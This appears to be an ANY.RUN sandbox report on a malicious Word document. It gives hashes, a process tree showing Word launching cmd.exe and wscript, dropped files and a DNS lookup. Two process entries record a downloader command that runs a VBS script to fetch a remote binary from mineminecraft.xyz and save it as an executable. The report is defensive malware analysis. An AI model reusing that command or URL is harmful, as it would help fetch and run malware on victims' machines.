File name: Yevette_Juliet_987131.doc
Full analysis: https://app.any.run/tasks/5992d72f-752d-4164-ae33-2ac4a5018e23
Verdict: Malicious activity
Analysis date: February 21, 2020, 22:51:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
encrypted
Indicators:
MIME: application/encrypted
File info: CDFV2 Encrypted
MD5: EA830AD32EC448F6D9BB6C7ECF8CB447
SHA1: D3005A74A0CE3C0A015F88443619C2F6C46C8361
SHA256: D871C6AB1A7AAAF5ED0826FE2564EC813AD582EE27A1F34AF53203895893FBF6
SSDEEP: 12288:srZxmRIRsw74kmYu3cwrD0Y+Snv0vuhW+UhZHve9s+:srmRohUkZuz1+vvuhWr3HAb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 3096)
    • Starts CMD.EXE for commands execution
      • WINWORD.EXE (PID: 3096)
  • SUSPICIOUS
    • Reads Internet Cache Settings
      • wscript.exe (PID: 1692)
      • wscript.exe (PID: 2316)
    • Executes scripts
      • cmd.exe (PID: 3720)
      • cmd.exe (PID: 2132)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3096)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 41
Monitored processes: 5
Malicious processes: 1
Suspicious processes: 0

Behavior graph

Processes shown in the graph (interactive view in the full report): winword.exe, cmd.exe, wscript.exe, cmd.exe, wscript.exe (no specs flagged for any of them)

Process information

PID: 3096
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Yevette_Juliet_987131.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3720
CMD: cmd /c ""C:\Colorfonts32\B4D9D02119.cmd" "
Path: C:\Windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1692
CMD: wscript //nologo c:\Colorfonts32\visitcard.vbs http://mineminecraft.xyz/yifumejyzhasamydfglb/onbtn.bin c:\Colorfonts32\secpi15.exe
Path: C:\Windows\system32\wscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 2132
CMD: cmd /c ""C:\Colorfonts32\B4D9D02119.cmd" "
Path: C:\Windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2316
CMD: wscript //nologo c:\Colorfonts32\visitcard.vbs http://mineminecraft.xyz/yifumejyzhasamydfglb/onbtn.bin c:\Colorfonts32\secpi15.exe
Path: C:\Windows\system32\wscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385
Total events: 2 197
Read events: 1 126
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 0
Text files: 73
Unknown types: 5

Dropped files

PID 3096, WINWORD.EXE:
  • C:\Users\admin\AppData\Local\Temp\CVR6039.tmp.cvr
  • C:\Users\admin\AppData\Local\Temp\~DF02A4ECC92C07D0D3.TMP
  • C:\Users\admin\AppData\Local\Temp\~DF30812A3A1DB8C363.TMP
  • C:\Users\admin\AppData\Local\Temp\~DFB4E87714F4821071.TMP
  • C:\Users\admin\AppData\Local\Temp\~DFA0129140167D228E.TMP
  • C:\Users\admin\AppData\Local\Temp\mso82D5.tmp
  • C:\Users\admin\AppData\Local\Temp\~DFE62F6B92CA5DF6FE.TMP
  • C:\Users\admin\AppData\Local\Temp\~DF85710F43E7E7A019.TMP
  • C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93CFC3F3.png
  • C:\Users\admin\Downloads\~$vette_Juliet_987131.doc (type: pgc)
    MD5: 4D86C2114068D8C7C445C933DBC4B26E
    SHA256: 2845E80FCF1503BDEED1C25D5EBF768B8395402EFAB59DAD40E3398E6291BBD3

No hashes are recorded for the other dropped files.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: mineminecraft.xyz
IP: (none recorded)
Reputation: suspicious

Threats

No threats detected
No debug info